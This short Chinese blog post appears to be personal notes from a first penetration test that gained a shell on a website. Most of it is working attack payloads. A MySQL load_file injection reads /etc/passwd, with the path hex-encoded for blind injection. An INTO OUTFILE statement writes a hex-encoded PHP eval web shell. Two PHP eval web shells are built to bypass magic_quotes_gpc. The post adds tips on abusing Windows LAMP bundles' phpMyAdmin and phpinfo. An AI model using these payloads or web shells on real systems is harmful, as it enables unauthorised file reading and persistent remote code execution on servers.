第一次渗透测试中拿到了getshell的站点,其中遇到的一些问题,也简单记录下
sql-injection
select substr(load_file(0x2f6574632f706173737764),1,1);
可用于盲注读取文件
select 0x3c3f706870206576616c28245f504f53545b315d293b3f3e into outfile 'test.php';
可直接写shell,但是如果存在 addslashes
等转义函数或者magic_quotes_gpc=On
则无法写入 文件名处必须是 单引号或者双引号明标的
getshell
phpmyadmin
不受magic_quotes_gpc=On
影响,sql语句可以正确执行
<?php
eval(base64_decode($_POST[1]));
?>
<?php
eval(stripslashes($_POST[1]));
?>
写入的shell绕过magic_quotes_gpc=On
,这里要注意ini_set('magic_quotes_gpc','Off');
无法绕过
服务器配置问题
Windows中的一些LAMP服务套件自带phpinfo
和phpmyadmin
为渗透测试提供了方便,而且套件为了即装即用,在权限的管理上比较宽松,往往存在注入或者代码执行或者命令执行时,可以读取相应服务的配置文件
此处评论已关闭